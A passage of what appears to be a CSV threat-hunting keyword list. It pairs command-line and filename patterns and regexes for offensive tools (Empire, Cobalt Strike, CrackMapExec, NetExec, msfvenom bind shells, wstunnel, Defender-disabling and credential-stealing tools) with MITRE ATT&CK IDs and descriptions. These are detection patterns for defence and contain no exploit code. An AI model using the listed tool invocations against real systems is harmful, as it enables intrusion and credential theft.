tools","https://github.com/r00t-3xp10it/redpill","1","0","https://github.com/r00t-3xp10it/redpill","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* whois-domain.nse*",".{0,1000}\swhois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* whois-ip.nse*",".{0,1000}\swhois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* will be obfuscated and integrated in created documents*",".{0,1000}\swill\sbe\sobfuscated\sand\sintegrated\sin\screated\sdocuments.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "* will be written to PME\*",".{0,1000}\swill\sbe\swritten\sto\sPME\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* WinBruteLogon.zip*",".{0,1000}\sWinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* windapsearch.py*",".{0,1000}\swindapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* winDefKiller *",".{0,1000}\swinDefKiller\s.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "* windows/csharp_exe*",".{0,1000}\swindows\/csharp_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework 
that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* windows/shell/bind_tcp *",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* windows/shell/bind_tcp *shellcode*",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Windows-Passwords.ps1*",".{0,1000}\sWindows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* WINHELLO2hashcat.py*",".{0,1000}\sWINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* WinPEAS - Windows local Privilege Escalation Awesome Script*",".{0,1000}\sWinPEAS\s\-\sWindows\slocal\sPrivilege\sEscalation\sAwesome\sScript.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* -winPEAS *",".{0,1000}\s\-winPEAS\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* WinPirate.bat*",".{0,1000}\sWinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* winrm * -u * -p * --laps*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-laps.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* winrm * -u * -p * -X whoami*",".{0,1000}\swinrm\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-X\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* winrm.py*",".{0,1000}\swinrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wldp-bypass=*",".{0,1000}\s\-\-wldp\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* --wmi *SELECT *",".{0,1000}\s\-\-wmi\s.{0,1000}SELECT\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* wmi_exec.exe*",".{0,1000}\swmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* wmiexec.py -k -no-pass *",".{0,1000}\swmiexec\.py\s\-k\s\-no\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* wmiexec.py*",".{0,1000}\swmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wmi-namespace 'root\cimv2'*",".{0,1000}\s\-\-wmi\-namespace\s\'root\\cimv2\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* wmirun=true dllpath=*.dll* computername=*",".{0,1000}\swmirun\=true\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* -wordlist * -spawnto 
*",".{0,1000}\s\-wordlist\s.{0,1000}\s\-spawnto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* --wordlist=*.lst*",".{0,1000}\s\-\-wordlist\=.{0,1000}\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -word-list-path * -file-extensions *",".{0,1000}\s\-word\-list\-path\s.{0,1000}\s\-file\-extensions\s.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* -word-list-path tomatch.txt*",".{0,1000}\s\-word\-list\-path\stomatch\.txt.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* -WorkingHours *",".{0,1000}\s\-WorkingHours\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - 
Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --wpad --lm --ProxyAuth --disable-ess**",".{0,1000}\s\-\-wpad\s\-\-lm\s\-\-ProxyAuth\s\-\-disable\-ess.{0,1000}.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* wraith.py*",".{0,1000}\swraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* wraith-server.py*",".{0,1000}\swraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* wraith-server_v*.py*",".{0,1000}\swraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* WriteToLsass*",".{0,1000}\sWriteToLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* ws://[::]:*",".{0,1000}\sws\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* wsdd-discover.nse*",".{0,1000}\swsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ws-dirs.txt*",".{0,1000}\sws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* ws-files.txt*",".{0,1000}\sws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* WSPCoerce.cs*",".{0,1000}\sWSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "* wss://0.0.0.0:*",".{0,1000}\swss\:\/\/0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* wstunnel.exe*",".{0,1000}\swstunnel\.exe.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - 
TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -X '$PSVersionTable' --amsi-bypass *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -X '$PSVersionTable' *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -x * --exec-method *",".{0,1000}\s\-x\s.{0,1000}\s\-\-exec\-method\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -X 
'[System.Environment]::Is64BitProcess'*",".{0,1000}\s\-X\s\'\[System\.Environment\]\:\:Is64BitProcess\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -X FUZZ http*",".{0,1000}\s\-X\sFUZZ\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -X whoami --obfs*",".{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -x -z --get-users-list*",".{0,1000}\s\-x\s\-z\s\-\-get\-users\-list.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -x 
